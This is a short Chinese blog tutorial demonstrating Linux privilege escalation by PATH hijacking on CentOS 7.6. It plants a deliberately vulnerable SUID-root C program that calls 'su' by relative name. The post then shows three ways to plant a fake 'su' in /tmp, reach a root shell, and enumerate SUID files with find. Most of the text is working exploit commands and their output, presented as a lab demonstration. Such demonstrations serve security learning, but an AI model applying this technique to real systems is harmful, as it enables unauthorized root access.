Linux 使用环境变量曲向获取 root 权限

实验平台：CentOS Linux release 7.6.1810

1.编写一个 C 代码

# vim demo.c

#include<unistd.h>
void main() {
  setuid(0);
  setgid(0);
  system("su - user");
}

2.生成文件（这里需要 root 权限）

# gcc demo.c -o switch
# chmod u+s switch

3.修改环境变量获取

$ echo "/bin/bash" > /tmp/su
$ chmod 777 /tmp/su
$ export PATH=/tmp:$PATH
$ echo $PATH

4.cp 方法获取

$ cp /bin/sh /tmp/su
$ export PATH=/tmp:$PATH

5.ln 软连获取

$ ln -s /bin/sh /tmp/su
$ export PATH=/tmp:$PATH

6.验证

$ id
uid=1000(test) gid=1000(test) groups=1000(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ sudo -i 

[sudo] password for test: 
test is not in the sudoers file.  This incident will be reported.
$ ./switch 
# id
uid=0(root) gid=0(root) groups=0(root),1000(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

7.查询所有的 s 权限位文件或权限位大于 4000 的

$ find / -perm -u=s -type f 2>/dev/null

Over~

663 0 2020-12-08

打赏一下，各位朋友请随意打赏！

×

如果觉得我的文章对你有用，请随意赞赏

取消